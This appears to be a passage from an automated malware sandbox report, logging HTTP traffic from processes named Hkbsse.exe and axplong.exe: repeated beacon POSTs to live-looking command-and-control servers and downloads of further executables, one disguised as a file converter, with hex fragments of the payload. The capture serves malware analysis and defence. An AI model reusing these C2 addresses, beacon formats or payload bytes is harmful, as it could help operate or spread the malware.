Jun 27, 2024 05:58:59.442862034 CEST	1236	IN	Data Raw: 24 18 8d 4c 24 48 c7 07 48 32 42 00 f3 0f 7e 44 24 28 66 0f d6 44 24 58 0f 57 c0 83 7c 24 5c 0f 66 0f 7e c8 66 0f d6 47 04 0f 11 4c 24 48 0f 47 c8 c6 44 24 14 01 8d 47 04 89 4c 24 10 50 8d 44 24 14 50 e8 2f 7e 00 00 8b 4c 24 64 83 c4 08 c7 07 b4 Data Ascii: $L$HH2B~D$(fD$XW\|$\f~fGL$HGD$GL$PD$P/~L$d2Bv)T$HArP#+w?QRpL$hT$lOL$`2BW_^][3sTV/Vt$WWGPH2BfFP}2B
Jun 27, 2024 05:58:59.442877054 CEST	104	IN	Data Raw: 04 50 e8 9c 79 00 00 c7 07 c0 32 42 00 83 c4 08 8b 46 0c 8b 4e 10 89 47 0c 8b c7 89 4f 10 c7 07 ac 33 42 00 5f 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 1c a1 00 ba 5b 00 33 c4 89 44 24 18 8b 54 24 20 0f 57 c0 8b 44 24 24 53 55 56 8b Data Ascii: Py2BFNGO3B_^[3D$T$ WD$$SUVXD$W8D$
Jun 27, 2024 05:58:59.442892075 CEST	1236	IN	Data Raw: c7 44 24 24 00 00 00 00 8d 69 01 66 90 8a 01 41 84 c0 75 f9 2b cd 51 52 8d 4c 24 18 e8 4c ee ff ff 8d 44 24 10 8b ce 50 53 57 e8 5e f9 ff ff 8b 4c 24 24 83 f9 0f 76 29 8b 54 24 10 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc Data Ascii: D$$ifAu+QRL$LD$PSW^L$$v)T$ArP#+w'QRkL$(_3B^][3nVt$WWGPH2BfFPx5BFNGO_^VD$t3BFD$WPH2BfD
Jun 27, 2024 05:58:59.442914963 CEST	1236	IN	Data Raw: 00 00 00 8b 46 1c 85 c0 74 09 50 e8 c9 b0 00 00 83 c4 04 c7 46 1c 00 00 00 00 8b 46 14 85 c0 74 09 50 e8 b2 b0 00 00 83 c4 04 c7 46 14 00 00 00 00 8b 46 0c 85 c0 74 09 50 e8 9b b0 00 00 83 c4 04 c7 46 0c 00 00 00 00 8b 46 04 85 c0 74 09 50 e8 84 Data Ascii: FtPFFtPFFtPFFtPF^j3VFtAN+rP#+w#QPfFFF^QVWNH4BtAHuP
Jun 27, 2024 05:58:59.442931890 CEST	1236	IN	Data Raw: a1 00 00 00 00 50 83 ec 18 53 56 57 a1 00 ba 5b 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b f9 8b 0f 8b 01 8d 55 dc 52 ff 50 08 c7 45 ec 00 00 00 00 8d 4d ec e8 0d 37 00 00 8b 0f 8b 45 ec 3b 41 08 0f 94 c3 8d 4d ec e8 fa 36 00 00 84 db 74 Data Ascii: PSVW[3PEdeURPEM7E;AM6tj7M:E(EPWM;PcMEut!Fu~OuPMdY_^[]uEPD"PEPb9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49749	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:00.050121069 CEST	185	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 30 30 30 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000020001&unit=246122658369
Jun 27, 2024 05:59:00.682171106 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49751	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:00.840532064 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:01.461146116 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:01.676093102 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:01.867031097 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49752	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:02.052968979 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:02.688508034 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:02.786240101 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:02.978472948 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49755	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:02.432629108 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000109001&unit=246122658369
Jun 27, 2024 05:59:03.057527065 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jun 27, 2024 05:59:03.293621063 CEST	49	OUT	GET /lend/123.exe HTTP/1.1 Host: 77.91.77.81
Jun 27, 2024 05:59:03.511334896 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:03 GMT Content-Type: application/octet-stream Content-Length: 304128 Last-Modified: Wed, 26 Jun 2024 16:01:49 GMT Connection: keep-alive ETag: "667c3b6d-4a400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f5 1f ce b6 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 02 00 00 d0 01 00 00 00 00 00 ca 9f 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 9f 02 00 4f 00 00 00 00 00 03 00 d4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 0c 00 00 00 5c 9f 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0 @ @xO\ H.text `.rsrc@@.reloc@B
Jun 27, 2024 05:59:03.511353016 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 9f 02 00 00 00 00 00 48 00 00 00 02 00 05 00 50 2a 01 00 54 74 01 00 03 00 00 Data Ascii: HP*TtK01s%~%-&~[s&%(+o(8o)%r
Jun 27, 2024 05:59:03.511365891 CEST	1236	IN	Data Raw: 01 00 00 70 72 59 00 00 70 7e 2a 00 00 0a 28 2b 00 00 0a a2 25 17 72 71 00 00 70 72 af 00 00 70 7e 2a 00 00 0a 28 2b 00 00 0a a2 25 18 72 c7 00 00 70 72 07 01 00 70 7e 2a 00 00 0a 28 2b 00 00 0a a2 25 19 72 21 01 00 70 72 61 01 00 70 7e 2a 00 00 Data Ascii: prYp~(+%rqprp~(+%rprp~(+%r!prap~(+(o,81(-sNsk~}~s.(/o0}{rqprp~(+o1,rprp~(++;
Jun 27, 2024 05:59:03.511425972 CEST	1236	IN	Data Raw: 67 01 00 06 00 25 11 11 6f 69 01 00 06 00 25 73 4f 00 00 0a 6f 63 01 00 06 00 25 73 50 00 00 0a 6f 65 01 00 06 00 13 1b 06 11 1b 6f 51 00 00 0a 00 00 11 10 28 09 00 00 2b 13 1c 11 1c 2c 64 00 73 6b 01 00 06 25 11 08 6f 5d 01 00 06 00 25 11 0b 72 Data Ascii: g%oi%sOoc%sPoeoQ(+,dsk%o]%rp(7o_%sNoa%og%oi%sOoc%sPoeoQoj,oQ(R:oSoT:%
Jun 27, 2024 05:59:03.511439085 CEST	1236	IN	Data Raw: 00 00 01 02 00 00 00 7a 00 00 00 52 00 00 00 cc 00 00 00 6f 00 00 00 00 00 00 00 00 00 00 00 43 00 00 00 38 01 00 00 7b 01 00 00 06 00 00 00 1a 00 00 01 00 00 00 00 07 00 00 00 7d 01 00 00 84 01 00 00 06 00 00 00 1a 00 00 01 1b 30 05 00 cc 01 00 Data Ascii: zRoC8{}0s8(U(V,(s%(YsZo&8Csq%ooWot%ooWo3.ov
Jun 27, 2024 05:59:03.511531115 CEST	1236	IN	Data Raw: 00 06 6f 57 00 00 0a 6f 82 01 00 06 00 25 11 05 11 06 18 6f 18 01 00 06 6f 57 00 00 0a 28 64 00 00 0a 6f 84 01 00 06 00 25 11 05 11 06 19 6f 18 01 00 06 6f 57 00 00 0a 28 64 00 00 0a 6f 86 01 00 06 00 25 11 05 11 06 1a 6f 18 01 00 06 08 28 07 00 Data Ascii: oWo%ooW(do%ooW(do%o(rp~o+o&,oeXo:K+ALr}A&
Jun 27, 2024 05:59:03.511543036 CEST	1236	IN	Data Raw: 00 01 25 d0 b2 02 00 04 28 59 00 00 0a 0d 07 08 6f 73 00 00 0a 00 07 09 6f 73 00 00 0a 00 07 6f 74 00 00 0a 73 5a 00 00 0a 72 c1 03 00 70 7e 2a 00 00 0a 28 2b 00 00 0a 13 04 11 04 28 75 00 00 0a 13 05 28 76 00 00 0a 11 05 6f 6b 00 00 0a 13 06 11 Data Ascii: %(YososotsZrp~(+(u(vokrp(w(x(V,(oz(V,(oz&+ACJ0sNs{s\|o}
Jun 27, 2024 05:59:03.511554003 CEST	552	IN	Data Raw: 51 00 00 0a 00 00 12 04 28 52 00 00 0a 3a 31 ff ff ff de 0f 12 04 fe 16 06 00 00 1b 6f 53 00 00 0a 00 dc 00 de 05 26 00 00 de 00 00 07 6f 54 00 00 0a 3a a9 fe ff ff de 0b 07 2c 07 07 6f 53 00 00 0a 00 dc 00 de 06 13 0b 00 00 de 00 06 13 0c 2b 00 Data Ascii: Q(R:1oS&oT:,oS+AdsI>[^nu\|0s8(v%(YsZrp~
Jun 27, 2024 05:59:03.511564016 CEST	1236	IN	Data Raw: 00 0a 00 00 00 11 05 17 58 13 05 11 05 08 6f 12 01 00 06 fe 04 13 08 11 08 3a 25 ff ff ff 00 de 05 26 00 00 de 00 06 13 04 2b 00 11 04 2a 00 41 34 00 00 00 00 00 00 a8 00 00 00 a2 00 00 00 4a 01 00 00 05 00 00 00 13 00 00 01 00 00 00 00 07 00 00 Data Ascii: Xo:%&+A4J{0~~%y(YsZ(w~o+%\o%f(YsZ(,+&+
Jun 27, 2024 05:59:03.511576891 CEST	1236	IN	Data Raw: 00 00 00 e1 02 00 00 e8 02 00 00 05 00 00 00 13 00 00 01 22 02 28 87 00 00 0a 00 2a 00 00 00 1b 30 03 00 91 00 00 00 11 00 00 11 00 00 1f 16 8d a5 00 00 01 25 d0 9e 02 00 04 28 59 00 00 0a 73 5a 00 00 0a 72 b1 03 00 70 7e 2a 00 00 0a 28 2b 00 00 Data Ascii: "(0%(YsZrp~(+(fog((vok>&oh~%-&~hs%(+,*OP>0g,+,O
Jun 27, 2024 05:59:03.511728048 CEST	1236	IN	Data Raw: 11 04 2d dc 17 0c 2b 00 08 2a 00 13 30 03 00 43 00 00 00 18 00 00 11 00 02 8e 69 0a 06 03 8e 69 fe 01 16 fe 01 0b 07 2c 05 00 16 0c 2b 2a 2b 1a 00 06 17 59 0a 02 06 94 03 06 94 fe 01 16 fe 01 0d 09 2c 05 00 16 0c 2b 0f 00 06 16 fe 03 13 04 11 04 Data Ascii: -+0Cii,++Y,+-+0\[s,4o&+rEpoo&Xi-]o&o+0?,+/iX+ Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49756	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:03.391820908 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:03.966763973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:04.279135942 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:04.581410885 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49758	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:04.886658907 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:05.487484932 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:05.604845047 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:05.800957918 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49759	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:05.217137098 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000110001&unit=246122658369
Jun 27, 2024 05:59:05.874085903 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49760	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:06.601279974 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:07.197087049 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:07.358350992 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:07.560775995 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49761	43.153.49.49	8888	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:06.792603016 CEST	64	OUT	GET /down/O3B6wY7ZkFhh.exe HTTP/1.1 Host: 43.153.49.49:8888
Jun 27, 2024 05:59:07.191020966 CEST	593	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=vcf-to-csv-converter.exe Content-Type: application/octet-stream Content-Length: 5898240 Last-Modified: Wed, 26 Jun 2024 17:53:52 GMT Cache-Control: no-cache, max-age=0 Expires: Thu, 27 Jun 2024 03:59:07 GMT ETag: "1719424432.340836-5898240-2433159533" Date: Thu, 27 Jun 2024 03:59:07 GMT Server: nginx Connection: keep-alive X-Frame-Options: SAMEORIGIN Set-Cookie: c50233950c3f39bd96d165eee1995d77=4d35933e-4098-4d9c-a342-9194989f64d0.B0uLxE_ywpoMuQTk0RbwSRoCfc4; Expires=Sat, 27 Jul 2024 03:59:07 GMT; HttpOnly; Path=/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49764	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:08.205521107 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:08.776711941 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:09.009902000 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:09.204268932 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49765	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:09.653604031 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:10.236427069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
